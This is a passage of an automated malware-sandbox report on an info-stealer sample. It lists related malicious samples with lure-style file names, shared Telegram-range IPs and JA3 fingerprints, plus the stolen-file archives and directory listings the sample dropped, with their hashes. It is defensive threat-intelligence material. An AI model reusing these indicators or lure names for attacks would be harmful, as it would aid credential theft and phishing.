                                                                                                                                                            92c0d20b-1d25-39a4-08a0-97f10465d636.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            7057_DRAFT-7947963_68379.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            SWIFT_Giden_mesaj_bildirimi_-_28740,80_USD_-_I103.pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            SecuriteInfo.com.Gen.Variant.Nemesis.22775.16398.31863.exeGet hashmaliciousAgentTesla, PrivateLoaderBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            SOA_#_87594094.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            Invoice_0230621_087860_092920-DOCX.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            Maersl_BL_208268807.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                            • 149.154.167.220

                                                                                                                                                            ASNs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            TELEGRAMRUDHL_KULI500796823__SCAN_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            yxZU6Cnjb59Epyk.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                                                                                                                                                            • 149.154.167.99
                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                            • 149.154.167.99
                                                                                                                                                            siJoJbrWS7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            2vGk2NUSlA.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            New_Order_List_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            SOA_#_87594094.exeGet hashmaliciousAgentTesla, FormBook, NeshtaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            Shipment_and_BL_Instructions_Docs.docx.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            UPDATED_STATEMENT_OF_ACCOUNT.exeGet hashmaliciousAgentTesla, NeshtaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            QUOTATION_9982.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            Documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            SecuriteInfo.com.Heur.31923.1569.exeGet hashmaliciousAgentTesla, NeshtaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            https://r20.rs6.net/tn.jsp?f=001mCGqfkWDccQgRQpUomPiFtBCTGG1uvzxWrqp2xHm0HAwYuOEF27vWN_ndR9LXjjQUXb7OKaahFKg-y1YwALCCosDcuBS09lw36XrDhIzP6gQx3IHnzj2P7Tcb-uMxO5kyL3rKZeMnbXhixJS8t4k2w==&c=O2LVuk-hTyOT6gGM-4etfNcTfH8-ifHJhmISUN-w4fnMvx3dWZ5wSQ==&ch=zJ8N-OGwAfd9etMd-_yFPn-Jpb678sPM90aINvOu_cBZKypsSQxR6Q==&__=?e=vicki.ng@sunventure.comGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                            • 149.154.167.99
                                                                                                                                                            file.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                            • 149.154.167.99
                                                                                                                                                            file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                            • 149.154.167.99
                                                                                                                                                            Holoo.apkGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            4mMceO3tR0.exeGet hashmaliciousVidarBrowse
                                                                                                                                                            • 149.154.167.99
                                                                                                                                                            H71bpT7h9B.exeGet hashmaliciousVidarBrowse
                                                                                                                                                            • 149.154.167.99
                                                                                                                                                            PURCHASE_ORDER_(2).exeGet hashmaliciousAgentTesla, NeshtaBrowse
                                                                                                                                                            • 149.154.167.220

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eDHL_KULI500796823__SCAN_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            yxZU6Cnjb59Epyk.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            DHL_EXPRESS-_AWB#8457108962.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            rAdz7Ra4TIGmFwkW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            z1RC_DEVUELTO.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            siJoJbrWS7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            snr_(1).exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            2vGk2NUSlA.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            New_Order_List_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            WO4nvScmkl.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            50%_Payment_Swift.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            Invoice_#_10623-27.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            SOA_#_87594094.exeGet hashmaliciousAgentTesla, FormBook, NeshtaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            UPDATED_STATEMENT_OF_ACCOUNT.exeGet hashmaliciousAgentTesla, NeshtaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            QUOTATION_9982.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            SOA_6009832115.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            94762156001348.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            SALE_ORDER_23062023.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114
                                                                                                                                                            Documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 172.67.196.114

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US.zip

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):194429
                                                                                                                                                            Entropy (8bit):7.924615946320513
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:mpJ7napa/j/KC3mnM6bXO11ptjP+DDZyyc:mpJ7nmGn3mv+11ptrgd0
                                                                                                                                                            MD5:9DEFF4882932AC0A3649D32EA5D3C997
                                                                                                                                                            SHA1:EB823BE728194B171E47904BC2AFC4A770998B2D
                                                                                                                                                            SHA-256:BD2EB00DEDA402482E5B610516F8A12508129754474606FA5E9B1A0D663AB1C2
                                                                                                                                                            SHA-512:11ED619A19D957E5AEB42907FD770039733F9559D70D4410B059F83987AB55AF099C36B9C8F74E66FA68AC288473F7294E2C208F1A5D4949B748CDF795E893F5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:PK...........V................Browsers\Google\PK...........V.@dU....Y.......Directories\Desktop.txt}R.n.0.<.R.!_`.!.n..1...q.z.$J......ox8.n...2;.3C...W.......+.C.;D.b..y...&.%.U.w.a.9....(.N....C. #......v.M".pgH..j..D...j...V.n2-AU.9w#.g)MpZrt>..Qi.k".+..h...!R...^.SmtD..aX+.1.....N..\..b.6W.)..^.L.x....d.#.3..nG..._.f......T&f!..{.{..^...*,...#L'..l.~............h.7..R..."%....).._.-.>.q..N.?./..7.a.x.......=.em........j.<........`G@E`..~.....V.z<...6.4.$......!...|Vs.g....d=...PK...........VtC.............Directories\Documents.txt}S.n.0.<.R.!_.._`0.....A.T..hI@.H..7..4..8k{gwf....X.....a.j.o.....V...q`...s.<..A(0...(@Fd.f.GT17....=Z\u>....0.......4T.Fq*6.u..[_..8.z..x..~..:.UkK...0.$#.y.T..9I"..\..K%....?...{;.h?..q.S9..r......{=._..*.o...Yy(..Ngq..\...{...i..T.Ia$"V..6b...4.Ki&..E'..b...L..[..@.......+.^...c....-M.TH<.'...;}.[/.,..&2..&..3b.!.;[.J,..D.|s.+..R..8S.4....[..`......|.........A`.@..] ..W.Car...r..?....g. ./PK...........V>.U....

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Directories\Desktop.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1113
                                                                                                                                                            Entropy (8bit):5.277208458772608
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:w0NUSMij6bNDlZlFQqdp0E5KDSGqMHFrntAD:lNUS96RflFQg0E5KDS4HFrn8
                                                                                                                                                            MD5:E4EF2ED890EF2936D4CE42B317003EA6
                                                                                                                                                            SHA1:440CBCB48C48F9F30EDDF6B3ECFBB8378F6C78CB
                                                                                                                                                            SHA-256:961475263A04C42E01FC81164D49DE25DA61937EA39EDB15354BDB5E18A410C1
                                                                                                                                                            SHA-512:AB849048DBF8751F4D9550DE4506A83F26F92FEC60C45C0BECA7DBB513B9828F4BE2AA0FEDEA21A9D6CBC070660609B6BD8C226F68D9F5D99FF63179D06B1672
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Desktop\...BUFZSQPCOH\...DQOFHVHTMG\...DUKNXICOZT\...FAAGWHBVUU\...FGAWOVZUJP\...HQJBRDYKDE\....FAAGWHBVUU.jpg....GJBHWQDROJ.png....GNLQNHOLWB.pdf....HQJBRDYKDE.docx....NIRMEKAMZH.xlsx....ZUYYDJDFVF.mp3...JJMNFRKQNU\...LHEPQPGEWF\...QFAPOWPAFG\....BQJUWOYRTO.png....GNLQNHOLWB.mp3....HQJBRDYKDE.xlsx....LHEPQPGEWF.pdf....NIRMEKAMZH.jpg....QFAPOWPAFG.docx...SNIPGPPREP\....BWETZDQDIB.mp3....GNLQNHOLWB.jpg....LHEPQPGEWF.xlsx....PWZOQIFCAN.pdf....SNIPGPPREP.docx....UBVUNTSCZJ.png...VWDFPKGDUF\....BXAJUJAOEO.mp3....HQJBRDYKDE.png....QFAPOWPAFG.pdf....SNIPGPPREP.jpg....VWDFPKGDUF.docx....WSHEJMDVQC.xlsx...ZUYYDJDFVF\...BQJUWOYRTO.png...BWETZDQDIB.mp3...BXAJUJAOEO.mp3...desktop.ini...Excel 2016.lnk...FAAGWHBVUU.jpg...file.exe...GJBHWQDROJ.png...GNLQNHOLWB.jpg...GNLQNHOLWB.mp3...GNLQNHOLWB.pdf...HQJBRDYKDE.docx...HQJBRDYKDE.png...HQJBRDYKDE.xlsx...LHEPQPGEWF.pdf...LHEPQPGEWF.xlsx...Microsoft Edge.lnk...NIRMEKAMZH.jpg...NIRMEKAMZH.xlsx...PWZOQIFCAN.pdf...QFAPOWPAFG.pdf...SNIPGPPREP.docx...SNIPGPP

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Directories\Documents.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1199
                                                                                                                                                            Entropy (8bit):5.308048578672995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:G0NUSMi8xrEEGy6h66bNDlZlFQqdp0f5KDSGqMJrptU:/NUSmBEEGy6c6RflFQg0f5KDS4JrpC
                                                                                                                                                            MD5:DC2A8C6DF432518DF6E6F7276323612F
                                                                                                                                                            SHA1:AD6E58DC1E495712C43D5668C11A078E3AD338D2
                                                                                                                                                            SHA-256:4CEAD438AB662CBBDA6C6D2BE493969C0C6DB47934233785C256F9BE6383CBFC
                                                                                                                                                            SHA-512:5AB881CC51968E4120940BE0A127F72CE14C3854C6D492371B80A7B83776CC31013A27CC043018E1D4BF56676F324FB821DCCC60FDD289539268E9937B4516BA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Documents\...BUFZSQPCOH\...DQOFHVHTMG\...DUKNXICOZT\...FAAGWHBVUU\...FGAWOVZUJP\...HQJBRDYKDE\....FAAGWHBVUU.jpg....GJBHWQDROJ.png....GNLQNHOLWB.pdf....HQJBRDYKDE.docx....NIRMEKAMZH.xlsx....ZUYYDJDFVF.mp3...JJMNFRKQNU\...LHEPQPGEWF\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...Outlook Files\....Outlook.pst...QFAPOWPAFG\....BQJUWOYRTO.png....GNLQNHOLWB.mp3....HQJBRDYKDE.xlsx....LHEPQPGEWF.pdf....NIRMEKAMZH.jpg....QFAPOWPAFG.docx...SNIPGPPREP\....BWETZDQDIB.mp3....GNLQNHOLWB.jpg....LHEPQPGEWF.xlsx....PWZOQIFCAN.pdf....SNIPGPPREP.docx....UBVUNTSCZJ.png...VWDFPKGDUF\....BXAJUJAOEO.mp3....HQJBRDYKDE.png....QFAPOWPAFG.pdf....SNIPGPPREP.jpg....VWDFPKGDUF.docx....WSHEJMDVQC.xlsx...ZUYYDJDFVF\...BQJUWOYRTO.png...BWETZDQDIB.mp3...BXAJUJAOEO.mp3...desktop.ini...FAAGWHBVUU.jpg...GJBHWQDROJ.png...GNLQNHOLWB.jpg...GNLQNHOLWB.mp3...GNLQNHOLWB.pdf...HQJBRDYKDE.docx...HQJBRDYKDE.png...HQJBRDYKDE.xlsx...LHEPQPGEWF.pdf...LHEPQPGEWF

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Directories\Downloads.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):442
                                                                                                                                                            Entropy (8bit):5.239888618585252
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:a8pGYLKUs5KDBvsGqdRghX5oZvsaSBlMBSjYky:a8p0f5KDSGqMJrptU
                                                                                                                                                            MD5:79C5766583CCA40454B012F352A91774
                                                                                                                                                            SHA1:734A84ED8F422C5992D8486207A53D5930B74980
                                                                                                                                                            SHA-256:D07117FE35E04F384C0DB0001C745A41C63A5154E3BBE67E7133BE457D3FBD88
                                                                                                                                                            SHA-512:F05EAFF064C30F74D590F9EA0E5838FDBF44E50B6F2CA925EFCD90BCDF796FB8CBF3149FE9303C2C3F240348371D4CACB51BA34A8F26E70AA38E7C54D486C336
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Downloads\...BQJUWOYRTO.png...BWETZDQDIB.mp3...BXAJUJAOEO.mp3...desktop.ini...FAAGWHBVUU.jpg...GJBHWQDROJ.png...GNLQNHOLWB.jpg...GNLQNHOLWB.mp3...GNLQNHOLWB.pdf...HQJBRDYKDE.docx...HQJBRDYKDE.png...HQJBRDYKDE.xlsx...LHEPQPGEWF.pdf...LHEPQPGEWF.xlsx...NIRMEKAMZH.jpg...NIRMEKAMZH.xlsx...PWZOQIFCAN.pdf...QFAPOWPAFG.docx...QFAPOWPAFG.pdf...SNIPGPPREP.docx...SNIPGPPREP.jpg...UBVUNTSCZJ.png...VWDFPKGDUF.docx...WSHEJMDVQC.xlsx...ZUYYDJDFVF.mp3..

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Directories\OneDrive.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11
                                                                                                                                                            Entropy (8bit):3.2776134368191165
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1hiRn:14Rn
                                                                                                                                                            MD5:1DA31A8EA979A8627E1C0630291B5B26
                                                                                                                                                            SHA1:903725300CBC8EEBD49847428F00AB6C20729D67
                                                                                                                                                            SHA-256:55FE800A4DA9F2E2A8C3EF6D768302B0CAC54DC55587812976CA493C276BAE30
                                                                                                                                                            SHA-512:220484AD810BA043CEB3C918E0472AA0F3A35D7F04C2BF8ADA31109012C2FDAA083A2ACD4AE20207608B83D54CDF0D4F077FF9B8027A6786E65548F8834E7AC6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:OneDrive\..

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Directories\Pictures.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):55
                                                                                                                                                            Entropy (8bit):4.401826932053255
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YzIVqIPLKKrLKB:nqyLKCLKB
                                                                                                                                                            MD5:154A3A46F2AC154FD11B51AE37F7BFB0
                                                                                                                                                            SHA1:5FF354343773ACBFB8973DF4B0D96FAFA5842668
                                                                                                                                                            SHA-256:BCF4D37446D020F5B6214E9896E607C7BDAFA7C118C0C3DC766211EC63AB841A
                                                                                                                                                            SHA-512:12CADFFFA2F45B77D48F30FE8C63E9FC5FF7712CD9C2AF275052722D5640DD4E7AE2D9C3D07328833438295CB63EB6F4A37CB82623453618E00B4F23A95618BC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Pictures\...Camera Roll\....desktop.ini...desktop.ini..

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Directories\Startup.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):24
                                                                                                                                                            Entropy (8bit):4.053508854797679
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:jgBLKB:j4LKB
                                                                                                                                                            MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                                                                                                            SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                                                                                                            SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                                                                                                            SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Startup\...desktop.ini..

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Directories\Temp.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1157
                                                                                                                                                            Entropy (8bit):4.943520290394916
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:buKsWaMmF5YK+ak5n2WMagRMLs6XCXM6/XUGcStJXqLUqoEAQK6DyO79D:aEaMmFO64n2WMaeMjXCXMQkGVtJAUqo0
                                                                                                                                                            MD5:06C5B152990F07068F3FC35D7EFEF3A2
                                                                                                                                                            SHA1:9A7AD15A57192E256A958A4BE430CC30B535373C
                                                                                                                                                            SHA-256:414885DBD53F4B4B5D3E6FD65A9CC2C5CB526860D9A9A495E201300DD7F6B058
                                                                                                                                                            SHA-512:DBF1C632A4E2B5D10AB17A8FC602250476B1C81E026B8D716FCD6FBEA4D21E98D118936142F28BA2FAC2ED81910B058B9133FDB7F87198B03A70A4A0F533122E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Temp\...CR_0E027.tmp\....setup.exe...Low\...outlook logging\....firstrun.log...VBE\...0164771190...0196354653...0409654664...0450125302...0518291756...0982390758...1033868256...1141274626...1206337459...1239919175...1422339599...1927994670...2103954313...2118371548...2162403398...2168651637...2385760553...2567238426...2585558601...2669049752...2760101248...2843307863...3322604653...3476888679...3643399760...4478492829...4676012234...4736274156...4965367024...5064077962...5281104033...5809130301...6183211589...6213653276...6329227256...6332783370...6577738837...6636805992...6730030605...7216804956...7457734050...7676687441...7847944919...8200946536...8351801105...8552718761...8975065801...9217021447...9329238007...9422479677...AdobeARM.log...aria-debug-3004.log...aria-debug-3336.log...ArmUI.ini...chrome_installer.log...JavaDeployReg.log...JSAMSIProvider32.dll...JSAMSIProvider64.dll...SetupExe(2020072310425948C).log...tmp1425.tmp...tmp27E2.tmp...tmp2841.tmp...tmp2842.tmp...tmp2843.tmp...

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Directories\Videos.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):23
                                                                                                                                                            Entropy (8bit):3.7950885863977324
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:k+JrLKB:k+JrLKB
                                                                                                                                                            MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                                                                                                            SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                                                                                                            SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                                                                                                            SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Videos\...desktop.ini..

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\BQJUWOYRTO.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.68639364218091
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
                                                                                                                                                            MD5:1D78D2A3ECD9D04123657778C8317C4E
                                                                                                                                                            SHA1:3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
                                                                                                                                                            SHA-256:88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
                                                                                                                                                            SHA-512:7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\FAAGWHBVUU.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696563923881884
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:5/VaDtnzLQ+f43tOT8I+KwurMekIRdXEt5L3tYor2Xp2CpvirtyrRofz/:hVaDQ3t9I+AFlXE7L3yLprvMEaD
                                                                                                                                                            MD5:CD90073A050D84BFC07DF7516A76BE8F
                                                                                                                                                            SHA1:5BA173F226A697FF62B1208D33B3BACA3B2EFC1D
                                                                                                                                                            SHA-256:8E77CEDA3994BC3AD371B51807B7B77A08F2F5A3A232C0991C4763C9B2E78E13
                                                                                                                                                            SHA-512:A07B25F8DB5B2E680122920BBDCFB6138ACD8856F203A447ED6E63E2411388567CC7ADB1C2DC2F9B87C7DCFD9671D1EAC8CB9FF9BB10677806755D739478C328
                                                                                                                                                            Malicious:false
